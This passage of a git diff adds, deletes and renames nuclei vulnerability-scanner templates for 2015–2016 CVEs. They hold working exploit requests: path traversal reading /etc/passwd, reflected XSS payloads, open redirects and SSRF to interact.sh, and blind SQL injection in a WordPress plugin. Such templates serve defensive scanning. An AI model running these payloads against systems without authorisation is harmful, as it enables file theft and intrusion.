4b0a00483046022100811332ca629cdfca6539bfdc50c6dd662a8522787a0bac631ecd72efe29ffd1b022100a97dd795f5dc0cfa69a7ecc65c1707b84fdf96eba9cbaeacde39a1356bba27f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-4668.yaml b/nuclei-templates/CVE-2015/cve-2015-4668.yaml new file mode 100644 index 0000000000..cb04dbfe5c --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-4668.yaml @@ -0,0 +1,43 @@ +id: CVE-2015-4668 + +info: + name: Xsuite <=2.4.4.5 - Open Redirect + author: 0x_Akoko + severity: medium + description: | + Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. + remediation: | + Upgrade Xsuite to a version higher than 2.4.4.5 to mitigate the open redirect vulnerability. + reference: + - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt + - https://vuldb.com/?id.107082 + - https://www.exploit-db.com/exploits/37708/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-4668 + - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2015-4668 + cwe-id: CWE-601 + epss-score: 0.00397 + epss-percentile: 0.73024 + cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: xceedium + product: xsuite + tags: cve2015,cve,redirect,xsuite,xceedium,edb + +http: + - method: GET + path: + - '{{BaseURL}}/openwin.php?redirurl=http://interact.sh' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4b0a004830460221009ee0f100e63fe1fb1f2fce30cefa8ea106fd61cde30ad3bbfe3ca713cc92dec602210098683f371b4cedc1c1d7f39a8a6aba9b813b585294104980333339b5e76ce0a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-4694.yaml b/nuclei-templates/CVE-2015/cve-2015-4694.yaml new file mode 100644 index 0000000000..97b8256f1d --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-4694.yaml @@ -0,0 +1,30 @@ +id: CVE-2015-4694 + +info: + name: Zip Attachments <= 1.1.4 - Arbitrary File Download + author: 0x_Akoko + severity: high + description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. + reference: https://wpscan.com/vulnerability/8047 + tags: lfi,wordpress,cve,cve2015,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2015-4694 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-5354.yaml b/nuclei-templates/CVE-2015/cve-2015-5354.yaml deleted file mode 100644 index 387ce0d925..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-5354.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2015-5354 - -info: - name: Novius OS 5.0.1-elche - Open Redirect - author: 0x_Akoko - severity: medium - description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. - remediation: | - Apply the latest security patches or upgrade to a newer version of Novius OS. - reference: - - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - - https://vuldb.com/?id.76181 - - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - - https://nvd.nist.gov/vul n/detail/CVE-2015-5354 - - https://www.exploit-db.com/exploits/37439/ - classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N - cvss-score: 5.8 - cve-id: CVE-2015-5354 - cwe-id: CWE-601 - epss-score: 0.00166 - epss-percentile: 0.53247 - cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: novius-os - product: novius_os - tags: cve2015,cve,packetstorm,redirect,novius,novius-os,xss - -http: - - method: GET - path: - - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502201fa0d9d2f70b020f889d8f45ac1c39f17dc563a71461963cc4c57b569f70d096022100ef358f446f62fcfbf11e15fb21855a3061d1f1cd2c38509a6fa7fc32a0256bf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-5461.yaml b/nuclei-templates/CVE-2015/cve-2015-5461.yaml deleted file mode 100644 index e5416a7c9e..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-5461.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: CVE-2015-5461 - -info: - name: StageShow <= 5.0.8 - Open Redirect - author: 0x_Akoko - severity: medium - description: Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. - reference: - - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16 - - https://nvd.nist.gov/vuln/detail/CVE-2015-5461 - tags: redirect,cve,cve2015,wordpress,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/nuclei-templates/CVE-2015/cve-2015-5531.yaml b/nuclei-templates/CVE-2015/cve-2015-5531.yaml deleted file mode 100644 index de74ca8495..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-5531.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2015-5531 -info: - name: ElasticSearch directory traversal vulnerability (CVE-2015-5531) - author: princechaddha - severity: high - description: Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. - reference: - - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 - - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 - tags: cve,cve2015,elasticsearch - -requests: - - raw: - - | - PUT /_snapshot/test HTTP/1.1 - Host: {{Hostname}} - - { - "type": "fs", - "settings": { - "location": "/usr/share/elasticsearch/repo/test" - } - } - - - | - PUT /_snapshot/test2 HTTP/1.1 - Host: {{Hostname}} - - { - "type": "fs", - "settings": { - "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" - } - } - - - | - GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'ElasticsearchParseException' - - 'Failed to derive xcontent from' - - '114, 111, 111, 116, 58' - condition: and - - - type: status - status: - - 400 diff --git a/nuclei-templates/CVE-2015/cve-2015-6544.yaml b/nuclei-templates/CVE-2015/cve-2015-6544.yaml deleted file mode 100644 index 23b0e18646..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-6544.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2015-6544 - -info: - name: iTop XSS - author: pikpikcu - severity: medium - description: | - Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. - reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 - tags: cve,cve2015,xss,itop - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2015-6544 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2015/cve-2015-8813.yaml b/nuclei-templates/CVE-2015/cve-2015-8813.yaml new file mode 100644 index 0000000000..cfc4cd20e0 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-8813.yaml @@ -0,0 +1,27 @@ +id: CVE-2015-8813 + +info: + name: Umbraco SSRF Vulnerability in Feedproxy.aspx + author: emadshanab + severity: high + description: A Server Side Request Forgery (SSRF) vulnerability in Umbraco in Feedproxy.aspx allows attackers to send arbitrary HTTP GET requests.Once you change the URL to the http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you able to access the localhost application of the server + reference: + - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 + tags: cve,cve2015,ssrf,oast,umbraco + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N + cvss-score: 8.20 + cve-id: CVE-2015-8813 + cwe-id: CWE-918 + +requests: + - method: GET + path: + - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}" + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2015/cve-2015-9480.yaml b/nuclei-templates/CVE-2015/cve-2015-9480.yaml deleted file mode 100644 index aff9aca94d..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-9480.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2015-9480 - -info: - name: WordPress Plugin RobotCPA 5 - Directory Traversal - author: daffainfo - severity: high - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 - - https://www.exploit-db.com/exploits/37252 - tags: cve,cve2015,wordpress,wp-plugin,lfi - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2015-9480 - cwe-id: CWE-22 - description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter." - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000126.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000126.yaml new file mode 100644 index 0000000000..e2b9a6d7ed --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-1000126.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000126 + +info: + name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin admin-font-editor v1.8 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=526 + - https://wordpress.org/plugins/admin-font-editor + - http://www.securityfocus.com/bid/93896 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000126 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000127.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000127.yaml new file mode 100644 index 0000000000..4259ca9297 --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-1000127.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000127 + +info: + name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin ajax-random-post v2.00 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=494 + - https://wordpress.org/plugins/ajax-random-post + - http://www.securityfocus.com/bid/93895 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000127 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000128.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000128.yaml deleted file mode 100644 index b824ab00f2..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000128.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2016-1000128 - -info: - name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin anti-plagiarism v3.60 - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - - https://wordpress.org/plugins/anti-plagiarism - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000128 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000131.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000131.yaml new file mode 100644 index 0000000000..14269d707f --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-1000131.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000131 + +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin e-search v1.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=393 + - https://wordpress.org/plugins/e-search + - http://www.securityfocus.com/bid/93867 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000131 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml deleted file mode 100644 index 154c2e4ebc..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2016-1000133 - -info: - name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 - - https://wordpress.org/plugins/forget-about-shortcode-buttons - - http://www.vapidlabs.com/wp/wp_advisory.php?v=602 - - http://www.securityfocus.com/bid/93869 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000133 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000134.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000134.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000134.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000134.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000135.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000135.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000135.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000135.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000137.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000137.yaml deleted file mode 100644 index 559d5ca9f7..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000137.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2016-1000137 - -info: - name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin hero-maps-pro v2.1.0 - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=658 - - https://wordpress.org/plugins/hero-maps-pro - - http://www.securityfocus.com/bid/93815 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000137 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin,maps - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000139.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000139.yaml deleted file mode 100644 index c07e1ac6b3..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000139.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2016-1000139 - -info: - name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin infusionsoft v1.5.11 - reference: - - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 - - https://wordpress.org/plugins/infusionsoft - - http://www.vapidlabs.com/wp/wp_advisory.php?v=864 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000139 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" - - matchers-condition: and - matchers: - - type: word - words: - - '"><"' - - 'input type="text" name="ContactId"' - condition: and - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000140.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000140.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000140.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000140.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000143.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000143.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000143.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000143.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000146.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000146.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000146.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000146.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000148.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000148.yaml deleted file mode 100644 index a397d31ae5..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000148.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2016-1000148 - -info: - name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin s3-video v0.983 - reference: - - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 - - https://wordpress.org/plugins/s3-video - - http://www.vapidlabs.com/wp/wp_advisory.php?v=240 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000148 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22" - - matchers-condition: and - matchers: - - type: word - words: - - '<"' - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml index f55daff95d..7998ec03d5 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml @@ -4,18 +4,14 @@ info: name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: Reflected XSS in wordpress plugin simpel-reserveren v3.5.2 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 - - https://wordpress.org/plugins/simpel-reserveren - - http://www.vapidlabs.com/wp/wp_advisory.php?v=474 - - http://www.securityfocus.com/bid/93582 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 + tags: cve,cve2016,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2016-1000149 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2" requests: - method: GET diff --git a/nuclei-templates/CVE-2016/cve-2016-1000153.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000153.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000153.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000153.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000155.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000155.yaml deleted file mode 100644 index 61d316c74a..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000155.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2016-1000155 -info: - name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin wpsolr-search-engine v7.6 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 - - https://wordpress.org/plugins/wpsolr-search-engine - - http://www.vapidlabs.com/wp/wp_advisory.php?v=303 - - http://www.securityfocus.com/bid/93536 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000155 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-10940.yaml b/nuclei-templates/CVE-2016/CVE-2016-10940.yaml new file mode 100644 index 0000000000..3898a7c31a --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-10940.yaml @@ -0,0 +1,50 @@ +id: CVE-2016-10940 + +info: + name: WordPress zm-gallery plugin 1.0 SQL Injection + author: cckuailong,daffainfo + severity: high + description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. + reference: + - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6 + - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-10940 + - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2016-10940 + cwe-id: CWE-89 + tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200' + - 'contains(body_2, "[zm_gallery id=")' + - 'contains(body_2, "